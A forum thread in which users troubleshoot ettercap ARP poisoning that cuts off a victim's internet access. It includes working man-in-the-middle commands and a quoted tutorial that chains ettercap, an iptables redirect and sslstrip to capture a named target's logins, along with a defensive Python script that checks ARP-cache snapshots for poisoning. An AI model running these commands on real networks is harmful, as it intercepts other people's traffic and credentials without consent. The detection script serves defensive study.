
Thread: Ettercap + Arp poisoning = Effectively DoS

  1. #1
    Junior Member (Join Date: Feb 2010, Posts: 26)

    Ettercap + Arp poisoning = Effectively DoS

    Hey guys, I would post this over at the ettercap forums, but they are already all but dead, and this question has been posed there as well.
    So I am hoping that the almighty forum gurus can help me.

    I'll quote a post by a user on the ettercap forums which effectively describes my problem too.

    "This problem happens in both the ncurses and GTK interfaces.

    I run unified sniffing in promiscuous mode. I am able to scan for hosts, to list one client on the target 1 list and the gateway on the target 2. Everything seems to go very well until I start the Mitm Arp poisoning.

    At this point, I receive tons of packets from the IP in the first list, so I'm assuming it has been poisoned with no problem. The problem, as far as I can surmise, is in my system. Not a single packet that my machine receives gets forwarded through to the gateway, and thus I essentially kill the connectivity of that user to the internet.

    The log at the bottom of the screen shows hundreds of these entries:

    SEND L3 ERROR: xxxx byte packet (0800:06) destined to xxx.xxx.xxx.xxx was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Invalid argument)

    I've tried looking into libnet and kernel iptables but I really don't want to get in over my head. Does anybody have some suggestions for me? I would really appreciate it. Thanks!"


    chkpoison reveals however that poisoning has not occurred, so how is it that this effectively kills the connectivity?

    Are there any solutions other than using another form of MITM attack?

  2. #2
    imported_onryo, Member (Join Date: Apr 2009, Posts: 109)

    Hmmm, ettercap should forward the data. Try using -u (think it was a little "u") to turn off ip_forward from ettercap and do it like this.

    Code:
    (-u: ettercap itself does no forwarding; the kernel does it instead)
    ettercap -T -u -q -i wlan0 -M arp /victim ip/ //
    (as root, in another shell: enable kernel IP forwarding)
    echo "1" > /proc/sys/net/ipv4/ip_forward

    Remember the -i wlan0 is MY interface. You might have another.

    chkpoison reveals however that poisoning has not occurred,
    Means just that. This does not look good. Could be a million reasons for this. Are you too far from the target? I am guessing you are not using BT4 since you have a working GTK. Is it set up right? In GTK under mitm try the one way poison.

    good luck
    onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  3. #3
    Junior Member (Join Date: Feb 2010, Posts: 26)

    I'm using BT4; I just used
    Code:
    apt-get install ettercap
    (I believe it was ettercap, but I can't remember.) Anyway, that solved the problem that comes with BT4.

    The reason why I wanted to use ARP is because of SSLstrip, but after reading threads that ettercap forwards automatically I omitted the command you included. I will try ettercap with -u and add the command once again.

    Thanks for the help.

    PS. Saw you mentioning using Swedish XP3; Swedish?

  4. #4
    imported_onryo, Member (Join Date: Apr 2009, Posts: 109)

    Yup I am Swedish, if you want to write in Swedish you can send me a private mail here on the forums.

    If you want to get SSLstrip working with ettercap I have a howto here on the forums. I also have a "get ettercap-GTK working" howto here on the forums. GTK does not always play nice with Ubuntu using ettercap.

    Take care
    onryo

    PS if you live in Sweden you might also know me by the name ph0t0n depending on who you hang out with. Are you L***** - Carlos?

  5. #5
    Junior Member (Join Date: Feb 2010, Posts: 26)

    Okay so I have tried all the tips to no luck.

    I'll quote your tutorial as well;

    As I sit here watching my boss surf the net in firefox (he asked me to see what I could exploit) using ettercap with the remote_browser plugin, I got a little annoyed to see that some of the sites he rolled into were SSL. No big deal, I was thinking.

    Now I got the http sites rolling into firefox and the SSLstrip just passing password, logins and other junk into the log file.

    Code:
    first fixed the /etc/etter.conf
    ec_uid = 0
    ec_gid = 0
    remote_browser = "firefox -remote openurl(http://%host%url)"

    Then just fired off
    # echo "1" > /proc/sys/net/ipv4/ip_forward
    # xhost local:root
    # ettercap -T -q -i wlan0 -M arp /192.168.0.101/ //    (192.168.0.101 = boss ip)
    # p                  (inside ettercap's text UI: p opens the plugin prompt)
    # remote_browser     (name of the plugin to activate)
    (You can do the above ettercap in one command but it seems a little unstable)
    # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    # python ./sslstrip.py -p -f -l 8080
    What I want is the SSL sites also rolling into firefox and not just passing the password to the log file. I am guessing it has something to do with remote_browser not listening to SSLstrip after it's done its magic on port 8080, or something along that line. Everything else works just fine.

    All the best
    onryo
    ___________
    As I mentioned I've read somewhere (I believe it was actually on these forums) that if you run a double session of ipforwarding (For instance once on ettercap and then once at kernel level) it would cause problems, but it seems to be working here for you.

    Could someone care to verify or explain?

    I'm not asking to be spoon fed and I'm sorry if it is taken as such guys, but I'm really trying to the best of my abilities.

    I'll try to learn bash after my finals are over so I can actually try to do something for myself...

  6. #6
    Just burned his ISO (Join Date: Jan 2010, Location: NY, US, Posts: 5)

    I had this problem too but I fixed it by making sure the ip forwarding was enabled.

  7. #7
    Just burned his ISO (Join Date: Feb 2010, Posts: 5)

    I have this problem too, but it effectively kills everyone on the network. I have five people on the network all hooked up through wireless, and it literally stops everyone from browsing the web.

    Can't figure out a way to fix it either.

  8. #8
    Member (Join Date: Dec 2007, Location: @InterN0T, Posts: 315)

    Did you remember to run ettercap -g as sudo or root? Else you will most likely have a few problems since I think it's using raw sockets.
    "I realized that I had fallen down from the top of the mountain into a deep, terrifying and dark hole, just to find out that another mountain in front of me, much greater than the previous, was the next step in life. I began to wander uphill on the next mountain of life while I knew it would be much harder than the previous mountain." - MaXe

  9. #9
    Junior Member (Join Date: May 2009, Posts: 42)

    Quote Originally Posted by MaXe Legend
    Did you remember to run ettercap -g as sudo or root? Else you will most likely have a few problems since I think it's using raw sockets.
    I'd agree with that; I remember being advised of this when I started experimenting with ettercap. I also recall exiting the program without stopping the attack / re-ARPing the victim. This resulted in exactly the DOS scenario you're describing. I realised this is yet another way an inexperienced "skiddie" can make a pest of himself.
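    The original poster wonders what chkpoison actually tells him, and the post above describes the leftover DoS when a tester quits without re-ARPing the victim. Both come down to what the victim's ARP cache looks like, so here is an added illustration (not ettercap's, chkpoison's or any poster's code) that compares two snapshots in the Linux /proc/net/arp format and flags the two classic signatures of a poisoned cache: an IP, above all the gateway, whose MAC has changed, and one MAC bound to several IPs at once. The snapshots, the addresses and the gateway IP 192.168.0.1 are constructed sample data, so the script runs offline; the same check works on a real host by reading /proc/net/arp at two points in time.

```python
"""Offline check of ARP-cache snapshots for the signatures of ARP poisoning.

Added illustration for this thread; it is not ettercap's, chkpoison's or any
poster's code. It reads the Linux /proc/net/arp format, but the snapshots below
are constructed sample data (IPs and MACs are made up), so it runs without a
network. The gateway address is assumed to be 192.168.0.1.
"""
from collections import defaultdict
from typing import Dict, List

GATEWAY_IP = "192.168.0.1"  # assumption for the sample network

# Constructed snapshot: a healthy table. The last row is an unresolved entry
# (flags 0x0, all-zero MAC), which a checker must ignore.
SNAP_BASELINE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.0.1      0x1         0x2         00:11:22:33:44:01     *        wlan0
192.168.0.101    0x1         0x2         00:11:22:33:44:65     *        wlan0
192.168.0.55     0x1         0x2         00:11:22:33:44:37     *        wlan0
192.168.0.200    0x1         0x0         00:00:00:00:00:00     *        wlan0
"""

# Constructed snapshot taken while the cache is poisoned: the gateway's IP now
# answers from the MAC that also owns .55, so one MAC claims two IPs. The same
# picture persists after a tester quits without re-ARPing: the stale entry keeps
# steering the host's traffic to a MAC that no longer forwards anything.
SNAP_POISONED = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.0.1      0x1         0x2         00:11:22:33:44:37     *        wlan0
192.168.0.101    0x1         0x2         00:11:22:33:44:65     *        wlan0
192.168.0.55     0x1         0x2         00:11:22:33:44:37     *        wlan0
"""


def parse_arp_table(text: str) -> Dict[str, str]:
    """Return {ip: mac} from /proc/net/arp text.

    The first line is the column header. Entries without the ATF_COM flag (0x2)
    or with an all-zero MAC are unresolved and carry no binding to compare.
    """
    table: Dict[str, str] = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, _hwtype, flags, mac, _mask, _device = fields[:6]
        if not int(flags, 16) & 0x2 or mac == "00:00:00:00:00:00":
            continue
        table[ip] = mac.lower()
    return table


def find_anomalies(baseline: Dict[str, str], current: Dict[str, str],
                   gateway_ip: str = GATEWAY_IP) -> List[str]:
    """Compare a trusted baseline with a later snapshot and return alert lines.

    Two signatures are reported: an IP whose MAC differs from the baseline
    (tagged GATEWAY when it is the default gateway, the usual target), and a
    single MAC bound to more than one IP, which is how a poisoned cache looks
    while one host impersonates both ends of a conversation.
    """
    alerts: List[str] = []
    for ip, mac in current.items():
        known = baseline.get(ip)
        if known is not None and known != mac:
            tag = "GATEWAY " if ip == gateway_ip else ""
            alerts.append(f"{tag}{ip} moved from {known} to {mac}")

    ips_by_mac: Dict[str, set] = defaultdict(set)
    for ip, mac in current.items():
        ips_by_mac[mac].add(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    return alerts


def check_snapshot(baseline_text: str, current_text: str) -> List[str]:
    """Convenience wrapper: parse both snapshots and run the comparison."""
    return find_anomalies(parse_arp_table(baseline_text), parse_arp_table(current_text))


if __name__ == "__main__":
    # On a live Linux host, replace the constructed text with open("/proc/net/arp").read()
    # taken at two points in time; here the constructed snapshots are used.
    for title, snap in (("baseline", SNAP_BASELINE), ("poisoned", SNAP_POISONED)):
        print(f"[{title}]")
        for alert in check_snapshot(SNAP_BASELINE, snap) or ["no anomalies"]:
            print("  " + alert)
```

    Run against the constructed data, the baseline compared with itself reports nothing, while the poisoned snapshot produces a GATEWAY alert for 192.168.0.1 and a second alert for the MAC that now claims two IPs. A host whose cache still shows that picture after the test has ended is exactly the stale-entry DoS described above, and pinning the gateway's MAC as a static ARP entry is the usual host-side mitigation.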

  10. #10
    Good friend of the forums (Join Date: Jun 2008, Posts: 425)

    SEND L3 ERROR: xxxx byte packet (0800:06) destined to xxx.xxx.xxx.xxx was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Invalid argument)
    Try:
    Code:
    ifconfig eth0 mtu 1500
    It worked for me.
